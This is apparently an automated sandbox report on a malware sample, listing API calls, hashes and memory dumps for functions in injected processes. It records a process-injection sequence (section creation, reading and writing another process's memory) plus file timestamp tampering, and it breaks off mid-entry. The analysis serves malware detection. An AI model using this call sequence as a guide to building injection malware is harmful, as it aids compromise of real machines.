                                                      • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                                                      • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                      • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

                                                      Control-flow Graph

                                                      • Rendered graph omitted; basic blocks 4018b1-40195b, calling Sleep and the subroutines at 401164, 4013cc and 4014bf
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                      • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                                                      • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                      • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

                                                      Control-flow Graph

                                                      • Rendered graph omitted; basic blocks 4018c2-40195b, calling Sleep and the subroutines at 401164, 4013cc and 4014bf
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                      • String ID:
                                                      • API String ID: 4152845823-0
                                                      • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                      • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                                      • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                      • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

                                                      Control-flow Graph

                                                      • Rendered graph omitted; basic blocks 4018da-40195b, calling Sleep and the subroutines at 401164, 4013cc and 4014bf
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                      • String ID:
                                                      • API String ID: 4152845823-0
                                                      • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                      • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                                                      • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                      • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40be4076c5679bef0f98681f4824eda593f4152bfce54b2e91414b645047e91a
                                                      • Instruction ID: e65dddffedb48bda66d8c9a675407c692fe6ac043651d9c697b88b541883c6e0
                                                      • Opcode Fuzzy Hash: 40be4076c5679bef0f98681f4824eda593f4152bfce54b2e91414b645047e91a
                                                      • Instruction Fuzzy Hash: E8413631409BD58FC7138F704A661AA7F64FD1332171801EFD881AB2A3C7399B16D79A
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                      • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                                                      • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                      • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                      • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                                                      • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                      • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                      • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                                                      • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                      • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                      • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                                                      • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                      • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                      • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                                                      • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                      • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                      • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                                                      • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                      • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                      • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                                                      • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                      • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                                                      Execution Graph

                                                      Execution Coverage:57.7%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:11%
                                                      Total number of Nodes:155
                                                      Total number of Limit Nodes:9
                                                      • Rendered execution graph omitted; root node 2801953, API calls reached along the graph: SleepEx, RtlCreateHeap, LoadLibraryA, CreateThread, CloseHandle, EnumWindows, CreateToolhelp32Snapshot, Process32First, Process32Next, GetTokenInformation, GetVolumeInformationA, CryptAcquireContextA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, ObtainUserAgentString, CreateMutexExA, CreateFileMappingA, DeleteFileW, CopyFileW, CreateFileW, GetUserNameW, CoCreateInstance, SetFileAttributesW, SetFileTime, ReadFile, WriteFile, ResumeThread, RtlAllocateHeap, RtlReAllocateHeap, CreateProcessInternalW, NtCreateSection, NtQueryInformationProcess, ReadProcessMemory, WriteProcessMemory

                                                      Callgraph


                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 02804760: NtCreateSection.NTDLL ref: 028047D2
                                                      • NtQueryInformationProcess.NTDLL ref: 028031A2
                                                      • NtQueryInformationProcess.NTDLL ref: 028031CA
                                                      • ReadProcessMemory.KERNEL32 ref: 028031FD
                                                      • ReadProcessMemory.KERNEL32 ref: 0280322B
                                                      • WriteProcessMemory.KERNEL32 ref: 028032A8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$Memory$InformationQueryRead$CreateSectionWrite
                                                      • String ID:
                                                      • API String ID: 1349948393-0
                                                      • Opcode ID: 927ceaa4fd3a0ab182866fb649d96750ab32dbc44d27f5517bfe2da6e0edd3e9
                                                      • Instruction ID: 1b74813d2321c49d356361a9da28da29c2672dbd8d53aa73bdf02186d94cc7a5
                                                      • Opcode Fuzzy Hash: 927ceaa4fd3a0ab182866fb649d96750ab32dbc44d27f5517bfe2da6e0edd3e9
                                                      • Instruction Fuzzy Hash: 7FB18435A18A4C8FDB58EF58D8856A9B3F1FB5C311F00427ED84AE3285DB30E9068BC5

                                                      Control-flow Graph

                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 2482764027-0
                                                      • Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                      • Instruction ID: 3ac37a8e4f3295d916b5ff73ecb06bde55b79edf6a411e4085ea241ddd77114d
                                                      • Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                      • Instruction Fuzzy Hash: 6821B738114A088FEB94EF64C8C87AA73E2FB88319F1406BED44FDA1D5DB3495858B51

                                                      Control-flow Graph

                                                      • API ID: CreateSection
                                                      • String ID: @$@
                                                      • API String ID: 2449625523-149943524
                                                      • Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                      • Instruction ID: 8b948b220472170e68bca73ce4155a58b834241b854067064d45a3cf5a2c5785
                                                      • Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                      • Instruction Fuzzy Hash: E7316FB8908B898FCB94DF58D8C566AB7E0FB5C306F10066EE95DE3291DB30D840CB85

                                                      Control-flow Graph

                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32 ref: 028051A9
                                                      Similarity
                                                      • API ID: AcquireContextCrypt
                                                      • String ID: %02X
                                                      • API String ID: 3951991833-436463671
                                                      • Opcode ID: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
                                                      • Instruction ID: 14f226123f28a14ad28bdfd1bf997f779445fc99663e68253b51fdea7f756ed0
                                                      • Opcode Fuzzy Hash: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
                                                      • Instruction Fuzzy Hash: C6317C30618A0D8FCF58EF68D8886EE7BA1FB98305F010279EC4EE7245DF3495419B95
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID:
                                                      • API String ID: 542301482-0
                                                      • Opcode ID: 74d1e6b67242ff682a275413a25c7c62c6eb1582b11612f6c2361affd49a2485
                                                      • Instruction ID: 80ee6b75805d9d779247e48ada8d5ee2d01e2c5444a72ca87d658c750a3ddd7a
                                                      • Opcode Fuzzy Hash: 74d1e6b67242ff682a275413a25c7c62c6eb1582b11612f6c2361affd49a2485
                                                      • Instruction Fuzzy Hash: 51E1EB34608A4C8FCB94EF28C895F99B7F1FFA9305F114699E44ACB265DB70E944CB42
                                                      APIs
                                                      • GetUserNameW.ADVAPI32 ref: 028034E4
                                                        • Part of subcall function 028035E8: CoCreateInstance.OLE32 ref: 02803635
                                                      Similarity
                                                      • API ID: CreateInstanceNameUser
                                                      • String ID:
                                                      • API String ID: 3213660374-0
                                                      • Opcode ID: 66936f5a13a6f90c6230e28eb3fdd20d3e72d878b8e61cb291cfd48d82a15998
                                                      • Instruction ID: 3c0d0b2fd842bd6a2d4cc0fa318b1bfd1f101af48d04ab706a8324f409dde88d
                                                      • Opcode Fuzzy Hash: 66936f5a13a6f90c6230e28eb3fdd20d3e72d878b8e61cb291cfd48d82a15998
                                                      • Instruction Fuzzy Hash: CB11DA38718B4C4FCBD4EF6C945875EB6D2FBDC310F904A6E984DC3295DA7889458B82

                                                      Control-flow Graph

                                                      Similarity
                                                      • API ID: Create$CloseHandleThread$HeapLibraryLoad
                                                      • String ID: %g?$iP+
                                                      • API String ID: 1420940861-765743493
                                                      • Opcode ID: beecc41ad1b9c7ac7640971538dc6f5c7c206b3b77287f35aeb0f1d381c9eb00
                                                      • Instruction ID: b10ee02a45f19e0e5f8070d87a7ef027a2088157d4df5a107fb80439743ad1b3
                                                      • Opcode Fuzzy Hash: beecc41ad1b9c7ac7640971538dc6f5c7c206b3b77287f35aeb0f1d381c9eb00
                                                      • Instruction Fuzzy Hash: 3C910638618A088FDF94EF18CCC56A573D6FB98310B48017E9C4ECB196DB34E952DB92

                                                      Control-flow Graph

                                                      APIs
                                                      • DeleteFileW.KERNEL32 ref: 02801F8E
                                                      • CopyFileW.KERNEL32 ref: 02801F9D
                                                      • DeleteFileW.KERNEL32 ref: 02801FAE
                                                      • DeleteFileW.KERNEL32 ref: 02801FF9
                                                        • Part of subcall function 02804920: SetFileAttributesW.KERNEL32 ref: 0280496F
                                                        • Part of subcall function 02804920: CreateFileW.KERNEL32 ref: 02804999
                                                        • Part of subcall function 02804920: SetFileTime.KERNEL32 ref: 028049C4
                                                      • CreateFileW.KERNEL32 ref: 02802085
                                                      Similarity
                                                      • API ID: File$Delete$Create$AttributesCopyTime
                                                      • String ID:
                                                      • API String ID: 642576546-0
                                                      • Opcode ID: 450f160cc9ca50c00f92dd82e014c961736e81def095327de2f357bf280c45cc
                                                      • Instruction ID: f76cee0920b55580d3c4e168a80583eef73ded69a24d376765d71a77410aa6f9
                                                      • Opcode Fuzzy Hash: 450f160cc9ca50c00f92dd82e014c961736e81def095327de2f357bf280c45cc
                                                      • Instruction Fuzzy Hash: EF414028718A4C4FCBD8AF6C589876D75D2EB9C311F50457EA80EC32C5DE789D068B92

                                                      Control-flow Graph

                                                      Similarity
                                                      • API ID: File$CreateDeleteWrite
                                                      • String ID: |:|
                                                      • API String ID: 2199199414-3736120136
                                                      • Opcode ID: 61796c1032acc2d464252e370c1eb990376f9906240aefb40997e5410d444d41
                                                      • Instruction ID: 2c7561992c36e0bba78d296a3cd920a12583e149bfe622b5c84c68ef455dc391
                                                      • Opcode Fuzzy Hash: 61796c1032acc2d464252e370c1eb990376f9906240aefb40997e5410d444d41
                                                      • Instruction Fuzzy Hash: C0E1AA34718F484FD7A9AB6C88987AA76D1FB98311F10462ED89FC32C5DF74E9018B46

                                                      Control-flow Graph

                                                      Similarity
                                                      • API ID: AgentCloseObtainOpenQueryStringUserValue
                                                      • String ID:
                                                      • API String ID: 2776781324-0
                                                      • Opcode ID: 24d59a88fc2a56af890fc7d913f5bd0d823e899b5ad6f282e20803fe12498a88
                                                      • Instruction ID: 3ad70815657a9b38439f47949a6d47874275e2c1b37f1bd0fcbf1cc72b18d522
                                                      • Opcode Fuzzy Hash: 24d59a88fc2a56af890fc7d913f5bd0d823e899b5ad6f282e20803fe12498a88
                                                      • Instruction Fuzzy Hash: 1331A835608A4C8FDB58EF6CDC896EA77D6FB98310B00027ADD5EC3585EF7498068B91

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 02804C90: GetVolumeInformationA.KERNEL32 ref: 02804CFD
                                                      • CreateMutexExA.KERNEL32 ref: 02801DFF
                                                      • CreateFileMappingA.KERNEL32 ref: 02801EB1
                                                      • SleepEx.KERNEL32 ref: 02801EEE
                                                      Similarity
                                                      • API ID: Create$FileInformationMappingMutexSleepVolume
                                                      • String ID:
                                                      • API String ID: 3744091137-0
                                                      • Opcode ID: b295d91b1288181eeec1ab488aa5c8e8f68c45d7ddea544eda9a6e783b4b8990
                                                      • Instruction ID: 2a2f1f48cf0963bfb1c46b42febfffec9d869a6feae233277bfd22060d4a076b
                                                      • Opcode Fuzzy Hash: b295d91b1288181eeec1ab488aa5c8e8f68c45d7ddea544eda9a6e783b4b8990
                                                      • Instruction Fuzzy Hash: DC418638714F088FEBA4EB78849C7AF76D2EF98716F504A2E805FD6180CF7495029B42

                                                      Control-flow Graph

                                                      Similarity
                                                      • API ID: File$AttributesCreateTime
                                                      • String ID:
                                                      • API String ID: 1986686026-0
                                                      • Opcode ID: 930f7abb6ba3d294a324d478d7cbd4b4fadb59d1e54ccc78cf6df5b131a4bb52
                                                      • Instruction ID: 95d17b88d091464d295adeb53da372b69cc724d3205cf8352d8ea0b0fba8d750
                                                      • Opcode Fuzzy Hash: 930f7abb6ba3d294a324d478d7cbd4b4fadb59d1e54ccc78cf6df5b131a4bb52
                                                      • Instruction Fuzzy Hash: 4521363070CB484FDF64EF58988875E76E2FBDC701F10456DA84EC7245DA34DA058782

                                                      Control-flow Graph

                                                      Similarity
                                                      • API ID: InformationToken$CloseHandle
                                                      • String ID:
                                                      • API String ID: 3193473064-0
                                                      • Opcode ID: c45b8c63f5540566594fff1aa2102bed85fce811da33fa4b3c4f4cd4104ad40d
                                                      • Instruction ID: d8f9bc2e4f69188bb20dc324b55574dfc4509fc35ee3c816286350af672bd11f
                                                      • Opcode Fuzzy Hash: c45b8c63f5540566594fff1aa2102bed85fce811da33fa4b3c4f4cd4104ad40d
                                                      • Instruction Fuzzy Hash: 4B215334208B088FC754EB2CD49866AB7E2FF99311B050A6EE49AC7254CB74DC05DB42

                                                      Control-flow Graph

                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 645ee96dd51e5548f5f84f988a5f238b2320184fe60a1c61053787b84221b83b
                                                      • Instruction ID: e831c251376a9d669a9f23a0b00386dcfa580c2198304f12806232654113a404
                                                      • Opcode Fuzzy Hash: 645ee96dd51e5548f5f84f988a5f238b2320184fe60a1c61053787b84221b83b
                                                      • Instruction Fuzzy Hash: 8CD17238758B098FDB94EF6CD88566EB7E2FB98701F50452DE54AD3281DB74D8028B82

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 028032EC: CreateFileW.KERNEL32 ref: 02803332
                                                        • Part of subcall function 028032EC: ReadFile.KERNEL32 ref: 02803379
                                                      • ResumeThread.KERNEL32 ref: 02802EFE
                                                      • SleepEx.KERNEL32 ref: 02802F43
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateReadResumeSleepThread
                                                      • String ID:
                                                      • API String ID: 3143597149-0
                                                      • Opcode ID: 365ea5b30f4c01e7835fe031ab68ac010f306e42860d01eb5cafeb498fe40cd3
                                                      • Instruction ID: cb5ea7ee88fcaadd628bdc8b3c2a0676ccaa59bcc1da444653c0be176c423282
                                                      • Opcode Fuzzy Hash: 365ea5b30f4c01e7835fe031ab68ac010f306e42860d01eb5cafeb498fe40cd3
                                                      • Instruction Fuzzy Hash: FD719A34308F499FD768EB28C8987AAB7D2FF98311F54452DD45EC3285DF74A8428B82

Control-flow Graph

Rendered graph omitted: function at 028032EC, basic blocks 028032EC-0280343C; calls CreateFileW (entry block 028032EC) and ReadFile (block 02803353).
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateRead
                                                      • String ID:
                                                      • API String ID: 3388366904-0
                                                      • Opcode ID: 860b54b27e55d88d468d3aef3d1eb136f62499f2293734d64539839b6a1dbfdb
                                                      • Instruction ID: c79ed3cf0cade407fdfd86877ccfe32798a986688a11d3fedaa10a1780b5a8c5
                                                      • Opcode Fuzzy Hash: 860b54b27e55d88d468d3aef3d1eb136f62499f2293734d64539839b6a1dbfdb
                                                      • Instruction Fuzzy Hash: 5B41C53871CF0D4FD798AA6C589937AB6C2FBC9311F54426E959FC3281DE24980247C2

Control-flow Graph

Rendered graph omitted: function at 02803CD0, basic blocks 02803CD0-02803D14; block 02803CE2 loops on itself, calling EnumWindows and SleepEx on each pass.
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnumSleepWindows
                                                      • String ID:
                                                      • API String ID: 498413330-0
                                                      • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                      • Instruction ID: 1463d5e46deb1595a3555ad154bed2e852597fb94a3d4e72d5661fa7ae90eeb7
                                                      • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                      • Instruction Fuzzy Hash: 34E04F345046098FFB68ABA4C4D8BB036A1EB18206F1401BADC0EDD285CB768995C720
                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32 ref: 0280465C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: af81d194f5fd3f12c6410c72f9c850e3bdf48fe1056d627e372d0d81f6bf526e
                                                      • Instruction ID: 44defb51d7f270c750abc859981a7be7908ba0bc13b15a02e5eef8d3f5e43656
                                                      • Opcode Fuzzy Hash: af81d194f5fd3f12c6410c72f9c850e3bdf48fe1056d627e372d0d81f6bf526e
                                                      • Instruction Fuzzy Hash: 4C316D34708F484FCB94EF6C948875AB6E2FB9C311F504A6E944ED3295DB78D8458B82
                                                      APIs
                                                      • GetVolumeInformationA.KERNEL32 ref: 02804CFD
                                                        • Part of subcall function 02805174: CryptAcquireContextA.ADVAPI32 ref: 028051A9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AcquireContextCryptInformationVolume
                                                      • String ID:
                                                      • API String ID: 4059528372-0
                                                      • Opcode ID: 570b72cb9fefb269fa565bf88e84819b9281ae41eeb4bd408b08a14378af43d4
                                                      • Instruction ID: 5ff07bd752fa8db797625aba05fd4c3e9b54ddc78cee21879b665b228ec3de38
                                                      • Opcode Fuzzy Hash: 570b72cb9fefb269fa565bf88e84819b9281ae41eeb4bd408b08a14378af43d4
                                                      • Instruction Fuzzy Hash: 2D318E34618B4C8FD794EF2CC84879977E2FB98311F50062E984ED7264DE34D9458B82
                                                      APIs
                                                        • Part of subcall function 028019D0: RtlCreateHeap.NTDLL ref: 02801AE7
                                                      • SleepEx.KERNEL32(?,?,?,?,?,?,?,02801973), ref: 028019A0
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateHeapSleep
                                                      • String ID:
                                                      • API String ID: 221814145-0
                                                      • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                      • Instruction ID: 34d133c5690be3e00550cd96fe64d10bedd82614cf9b53e792362d9b8a5fd0e1
                                                      • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                      • Instruction Fuzzy Hash: BFE0481CB14A084BDBD4B77D9CCC33C61A1DBC8365F941579691DC61C5D924C8408723
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: tPp
                                                      • API String ID: 0-1477601333
                                                      • Opcode ID: 3944d7dc5a17a6eda8477535b051b589c72a69c3be36b9d0cad756d7991e27b2
                                                      • Instruction ID: 984a511bd6c1b92eedd379f0cb460840ebb14cddba1a92eb663062b0a70304be
                                                      • Opcode Fuzzy Hash: 3944d7dc5a17a6eda8477535b051b589c72a69c3be36b9d0cad756d7991e27b2
                                                      • Instruction Fuzzy Hash: EC210C353006118FC749EB38C458A2D77F6AF8A61532605A9E546CF372DF76DC42CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8p
                                                      • API String ID: 0-2220451280
                                                      • Opcode ID: 032cb9975b8c38365436980e707c95e20df0feb425b0ad43c6c243ff31604d4f
